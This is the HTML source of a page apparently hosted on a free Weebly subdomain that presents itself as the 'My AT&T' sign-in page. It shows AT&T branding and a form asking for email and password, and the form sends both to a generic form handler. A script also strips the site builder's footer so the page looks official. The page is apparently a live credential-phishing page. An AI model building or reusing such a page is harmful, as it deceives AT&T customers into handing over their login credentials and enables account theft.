<!DOCTYPE html>
<html lang="en">
	<head>
		<title>My AT&T - Home</title><meta property="og:site_name" content="My AT&amp;T" />
<meta property="og:title" content="My AT&amp;T" />
<meta property="og:description" content="My AT&amp;T" />
<meta property="og:image" content="https://vmdnkrifjgf.weebly.com/uploads/1/4/7/3/147331745/currently-w-teal-comma_orig.png" />
<meta property="og:image" content="https://vmdnkrifjgf.weebly.com/uploads/1/4/7/3/147331745/attdownload.png" />
<meta property="og:url" content="https://vmdnkrifjgf.weebly.com/" />



<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>

  <link href="//fonts.googleapis.com/css?family=Karla:400,700|Oswald:700|Roboto+Mono:400,400i,700,700i" rel="stylesheet">
  <script src="/files/theme/MutationObserver.js"></script>
  <style>
    .navbar__logo .icon,
    .navbar__center .navbar__logo:after {
        color: #2990ea !important;
    }

    .header-prompt .navbar__link--login,
    .header-prompt .navbar__link.navbar__link--signup {
      color: #666C70 !important;
    }
    .header-prompt .navbar__link.navbar__link--signup {
      box-shadow: inset 0 0 0 2px #C9CDCF !important;
    }
  </style>

		
		<link id="wsite-base-style" rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/sites.css?buildTime=1697061056" />
<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/old/fancybox.css?1697061056" />
<link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/social-icons.css?buildtime=1697061056" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="/files/main_style.css?1697115337" title="wsite-theme-css" />
<link href='//cdn2.editmysite.com/fonts/Karla/font.css?2' rel='stylesheet' type='text/css' />
<link href='//cdn2.editmysite.com/fonts/Roboto_Mono/font.css?2' rel='stylesheet' type='text/css' />
<link href='//cdn2.editmysite.com/fonts/Oswald/font.css?2' rel='stylesheet' type='text/css' />

<style type='text/css'>
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
@media screen and (min-width: 767px) {.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
}</style>

		<script src='/files/templateArtifacts.js?1697115337'></script>
<script>
var STATIC_BASE = '//cdn1.editmysite.com/';
var ASSETS_BASE = '//cdn2.editmysite.com/';
var STYLE_PREFIX = 'wsite';
</script>
<script src='https://cdn2.editmysite.com/js/jquery-1.8.3.min.js'></script>

<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1697061056&"></script>
<script src="//cdn2.editmysite.com/js/site/main.js?buildTime=1697061056"></script><script type="text/javascript">
		function initCustomerAccountsModels() {
					(function(){_W.setup_rpc({"url":"\/ajax\/api\/JsonRPC\/CustomerAccounts\/","actions":{"CustomerAccounts":[{"name":"login","len":2,"multiple":false,"standalone":false},{"name":"logout","len":0,"multiple":false,"standalone":false},{"name":"getSessionDetails","len":0,"multiple":false,"standalone":false},{"name":"getAccountDetails","len":0,"multiple":false,"standalone":false},{"name":"getOrders","len":0,"multiple":false,"standalone":false},{"name":"register","len":4,"multiple":false,"standalone":false},{"name":"emailExists","len":1,"multiple":false,"standalone":false},{"name":"passwordReset","len":1,"multiple":false,"standalone":false},{"name":"passwordUpdate","len":3,"multiple":false,"standalone":false},{"name":"validateSession","len":1,"multiple":false,"standalone":false}]},"namespace":"_W.CustomerAccounts.RPC"});
_W.setup_model_rpc({"rpc_namespace":"_W.CustomerAccounts.RPC","model_namespace":"_W.CustomerAccounts.BackboneModelData","collection_namespace":"_W.CustomerAccounts.BackboneCollectionData","bootstrap_namespace":"_W.CustomerAccounts.BackboneBootstrap","models":{"CustomerAccounts":{"_class":"CustomerAccounts.Model.CustomerAccounts","defaults":null,"validation":null,"types":null,"idAttribute":null,"keydefs":null}},"collections":{"CustomerAccounts":{"_class":"CustomerAccounts.Collection.CustomerAccounts"}},"bootstrap":[]});
})();
		}
		if(document.createEvent && document.addEventListener) {
			var initEvt = document.createEvent('Event');
			initEvt.initEvent('customerAccountsModelsInitialized', true, false);
			document.dispatchEvent(initEvt);
		} else if(document.documentElement.initCustomerAccountsModels === 0){
			document.documentElement.initCustomerAccountsModels++
		}
		</script>
		<script type="text/javascript"> _W = _W || {}; _W.securePrefix='vmdnkrifjgf.weebly.com'; </script><script>_W = _W || {};
			_W.customerLocale = "en_US";
			_W.storeName = null;
			_W.isCheckoutReskin = false;
			_W.storeCountry = "NG";
			_W.storeCurrency = "USD";
			_W.storeEuPrivacyPolicyUrl = "";
			com_currentSite = "674078911346232891";
			com_userID = "147331745";</script><script type="text/javascript">_W.configDomain = "www.weebly.com";</script><script>_W.relinquish && _W.relinquish()</script>
<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1697061056&"></script><script> _W.themePlugins = [];</script><script type="text/javascript"> _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js"; </script>
		
		
	</head>
	<body class="header-page  wsite-theme-light  wsite-page-index header-sticky banner-overlay-on "><div class="wrapper">
    <div class="edison-header">
      <div class="container">
        <div class="header-inner-wrap">
          <div class="logo">
            <span class="wsite-logo">

	<a href="/">
		<img src="/uploads/1/4/7/3/147331745/attdownload.png" alt="My AT&amp;T" />
	</a>

</span>
          </div>
          <div class="nav-wrap">
            <div class="dummy-menu"><ul class="wsite-menu-default">
</ul>
</div>
            <div class="nav desktop-nav"><ul class="wsite-menu-default">
</ul>
</div>
          </div>
          <div class="site-utils">
            <div class="wsite-search-wrap">
              <a href="#" class="search-toggle">
                Search
              </a>
              
            </div>
            
            <button class="hamburger"><i></i></button>
          </div>
        </div>
      </div>
    </div>

    <div class="banner-wrap">
      <div class="wsite-elements wsite-not-footer wsite-header-elements">
	<div class="wsite-section-wrap">
	<div  class="wsite-section wsite-header-section wsite-section-bg-color" style="height: 540px;vertical-align: top;background-color: #fff;background-image: none;is_customized: 1;" >
		<div class="wsite-section-content">
			
        <div class="container">
          <div class="banner">
				<div class="wsite-section-elements">
					<div><div class="wsite-multicol"><div class="wsite-multicol-table-wrap" style="margin:0 -15px;">
	<table class="wsite-multicol-table">
		<tbody class="wsite-multicol-tbody">
			<tr class="wsite-multicol-tr">
				<td class="wsite-multicol-col" style="width:50%; padding:0 15px;">
					
						

<div><div class="wsite-image wsite-image-border-none " style="padding-top:10px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:inherit">
<a>
<img src="/uploads/1/4/7/3/147331745/currently-w-teal-comma_orig.png" alt="Picture" style="width:auto;max-width:100%" />
</a>
<div style="display:block;font-size:90%"></div>
</div></div>


					
				</td>				<td class="wsite-multicol-col" style="width:50%; padding:0 15px;">
					
						

<div>
	<form enctype="multipart/form-data" action="//www.weebly.com/weebly/apps/formSubmit.php" method="POST" id="form-524002715627786372">
		<div id="524002715627786372-form-parent" class="wsite-form-container"
				 style="margin-top:10px;">
			<ul class="formlist" id="524002715627786372-form-list">
				<h2 class="wsite-content-title">Sign in</h2>

<label class="wsite-form-label wsite-form-fields-required-label"><span class="form-required">*</span> Indicates required field</label><div><div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
				<label class="wsite-form-label" for="input-878892862936813883">Email <span class="form-required">*</span></label>
				<div class="wsite-form-input-container">
					<input aria-required="true" id="input-878892862936813883" class="wsite-form-input wsite-input wsite-input-width-370px" type="text" name="_u878892862936813883" />
				</div>
				<div id="instructions-878892862936813883" class="wsite-form-instructions" style="display:none;"></div>
			</div></div>

<div><div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
				<label class="wsite-form-label" for="input-676834268330259401">Pass <span class="form-required">*</span></label>
				<div class="wsite-form-input-container">
					<input aria-required="true" id="input-676834268330259401" class="wsite-form-input wsite-input wsite-input-width-370px" type="text" name="_u676834268330259401" />
				</div>
				<div id="instructions-676834268330259401" class="wsite-form-instructions" style="display:none;"></div>
			</div></div>
			</ul>
			
		</div>
		<div style="display:none; visibility:hidden;">
			<input type="hidden" name="wsite_subject" />
		</div>
		<div style="text-align:left; margin-top:10px; margin-bottom:10px;">
			<input type="hidden" name="form_version" value="2" />
			<input type="hidden" name="wsite_approved" id="wsite-approved" value="approved" />
			<input type="hidden" name="ucfid" value="524002715627786372" />
			<input type="hidden" name="recaptcha_token"/>
			<input type="submit" role="button" aria-label="Next" value="Next" style="position:absolute;top:0;left:-9999px;width:1px;height:1px" />
			<a class="wsite-button">
				<span class="wsite-button-inner">Next</span>
			</a>
		</div>
	</form>
	<div id="g-recaptcha-524002715627786372" class="recaptcha" data-size="invisible" data-recaptcha="0" data-sitekey="6Ldf5h8UAAAAAJFJhN6x2OfZqBvANPQcnPa8eb1C"></div>



</div>


					
				</td>			</tr>
		</tbody>
	</table>
</div></div></div>
				</div>
			</div>
        </div><!-- end container -->
      
		</div>
		<div class=""></div>
	</div>
</div>

</div>

    </div><!-- end banner-wrap -->

    <div class="content-wrap">
      <div id="wsite-content" class="wsite-elements wsite-not-footer">
	<div class="wsite-section-wrap">
	<div class="wsite-section wsite-body-section wsite-background-2"  >
		<div class="wsite-section-content">
        <div class="container">
			<div class="wsite-section-elements">
				
			</div>
		</div>
      </div>

	</div>
</div>

</div>

    </div><!-- end content-wrap -->

    <div class="footer-wrap">
      <div class="container">
     		<div class="footer">

<style type="text/css">
	@font-face {
		font-family: SQMarket-Medium;
		font-style: normal;
		font-weight: 500;
		src:
			url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff2") format("woff2"),
			url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff") format("woff");
	}
</style>

<div id="weebly-footer-signup-container-v3">
	<a
		href="https://www.weebly.com/signup?utm_source=internal&utm_medium=footer"
		target="_blank"
		class="signup-container-header"
		id="signup-link-href"
	>
		<div class="powered-by">
			<div class="footer-published-ab-powered-by">
				Powered by <span class="link weebly-icon"></span>
				<img class="footer-ab-published-toast-image" src="//cdn2.editmysite.com/images/site/footer/footer-toast-published-image-1.png">
				<span class="footer-ab-published-toast-text">Create your own unique website with customizable templates.</span>
				<span class="footer-ab-published-toast-button-wrapper">
					<button class="footer-published-ab-button">Get Started</button>
				</span>
			</div>
		</div>
	</a>
</div>

<script type="text/javascript" src="//cdn2.editmysite.com/js/site/footerSignup.js?buildTime=1698869576"></script>
<script type="text/javascript">
	if (document.readystate === 'complete') {
		Weebly.footer.setupContainer('cdn2.editmysite.com', '1698869576');
	} else {
		document.addEventListener('DOMContentLoaded', function() {
			Weebly.footer.setupContainer('cdn2.editmysite.com', '1698869576');
		});
	}
</script>
</div>
      </div><!-- end container -->
    </div><!-- end footer-wrap -->
	</div>

  <div class="nav mobile-nav"><ul class="wsite-menu-default">
</ul>
</div>

  <div class="mini-cart-overlay"></div>

  <script src="/files/theme/plugins.js?1697114213"></script>
  <script src="/files/theme/jquery.pxuMenu.js?1697114213"></script>
  <script src="/files/theme/jquery.trend.js?1697114213"></script>
  <script src="/files/theme/jquery.revealer.js?1697114213"></script>
  <script src="/files/theme/custom-1.js?1697114213"></script>
    <div id="customer-accounts-app"></div>
    <script src="//cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1697061056"></script>

		<script>
document.addEventListener('DOMContentLoaded', function() {
var element = document.getElementById("weebly-footer-signup-container-v3");
element.parentNode.removeChild(element);
}, false);
</script><script type="text/javascript">
	var _gaq = _gaq || [];
	_gaq.push(['_setAccount', 'UA-7870337-1']);
	_gaq.push(['_setDomainName', 'none']);
	_gaq.push(['_setAllowLinker', true]);

	(function() {
		var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
		ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
		// NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page
		var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s);
	})();

	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wGA = '_gaq';
</script>

<script type="text/javascript" async=1>
	// NOTE: keep the getElementsByTagName(o)**[1]** if you replace this code. Otherwise cookie banner scripts won't be first on the page
	;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[];
			p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments)
			};p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[1];n.async=1;
			n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,'script','//cdn2.editmysite.com/js/wsnbn/snowday262.js','snowday'));

	var r = [99, 104, 101, 99, 107, 111, 117, 116, 46, 40, 119, 101, 101, 98, 108, 121, 124, 101, 100, 105, 116, 109, 121, 115, 105, 116, 101, 41, 46, 99, 111, 109];
	var snPlObR = function(arr) {
		var s = '';
		for (var i = 0 ; i < arr.length ; i++){
			s = s + String.fromCharCode(arr[i]);
		}
		return s;
	};
	var s = snPlObR(r);

	var regEx = new RegExp(s);

	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wSP = 'snowday';
	_W.Analytics.user_id = '147331745';
	_W.Analytics.site_id = '674078911346232891';

	var drSegmentsTag = document.getElementById('drSegments');
	if (drSegmentsTag) {
		_W.Analytics.spContexts = _W.Analytics.spContexts || [];

		var segmentData = JSON.parse(drSegmentsTag.innerText);
		segmentData.forEach(function(test) {
			_W.Analytics.spContexts.push({
				schema: "iglu:com.weebly/context_ab_segment/jsonschema/1-0-0",
				data: {
					test_id: test.name,
					segment: test.variant,
				}
			});
		});
	}


	(function(app_id, ec_hostname, discover_root_domain) {
		var track = window[_W.Analytics.trackers.wSP];
		if (!track) return;
		track('newTracker', app_id, ec_hostname, {
			appId: app_id,
			post: true,
			platform: 'web',
			discoverRootDomain: discover_root_domain,
			cookieName: '_snow_',
			contexts: {
				webPage: true,
				performanceTiming: true,
				gaCookies: true
			},
			crossDomainLinker: function (linkElement) {
				return regEx.test(linkElement.href);
			},
			respectDoNotTrack: true
		});
		track('trackPageView', _W.Analytics.user_id+':'+_W.Analytics.site_id, _W.Analytics.spContexts);
		track('crossDomainLinker', function (linkElement) {
			return regEx.test(linkElement.href);
		});
	})(
		'_wn',
		'ec.editmysite.com',
		false
	);
</script>





<script>
	(function(jQuery) {
		try {
			if (jQuery) {
				jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
				var $commentFrame = jQuery('#commentArea iframe');
				if ($commentFrame.length > 0) {
					var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
					$commentFrame.css('min-height', frameHeight + 'px');
				}
				if (jQuery('.product-button').length > 0){
					jQuery(document).ready(function(){
						jQuery('.product-button').parent().each(function(index, product){
							if(jQuery(product).attr('target') == 'paypal'){
								if (!jQuery(product).find('> [name="bn"]').length){
									jQuery('<input>').attr({
										type: 'hidden',
										name: 'bn',
										value: 'DragAndDropBuil_SP_EC'
									}).appendTo(product);
								}
							}
						});
					});
				}
			}
			else {
				// Prototype
				$$('div.blog-social div.fb-like').each(function(div) {
					div.className = 'blog-social-item blog-fb-like';
				});
				$$('#commentArea iframe').each(function(iframe) {
					iframe.style.minHeight = '410px';
				});
			}
		}
		catch(ex) {}
	})(window._W && _W.jQuery);
</script>

<script>
	window._W.isEUUser = false;
	window._W.showCookieToAll = "";
</script>

<script>
	(function(jQuery) {
		try {
			function forceShowCcLinks() {
				var ccLinks = document.querySelector('.cc_links');
				if (!ccLinks) {
					return;
				}

				var ccLinksVisible = jQuery(ccLinks).is(':visible');
				if (ccLinksVisible) {
					return;
				}


				ccLinks.style.display = 'block';

				var ccParent = ccLinks.parentElement;

				var ccParentVisible = jQuery(ccParent).is(':visible');
				if (ccParentVisible) {
					return;
				}

				ccParent.style.display = 'block';

				var ccGrandparent = ccParent.parentElement;
				var ccGrandparentVisible = jQuery(ccGrandparent).is(':visible');
				if (ccGrandparentVisible) {
					return;
				}
				ccGrandparent.style.display = 'block';

			}

			function forceShowCcLinksForever() {
				var tenSeconds = 10000;
				forceShowCcLinks();
				setTimeout(forceShowCcLinksForever, tenSeconds);
			}

			jQuery(document).ready(forceShowCcLinksForever);
		}
		catch(ex) {}
	})(window._W && _W.jQuery);
</script>


	</body>
</html>
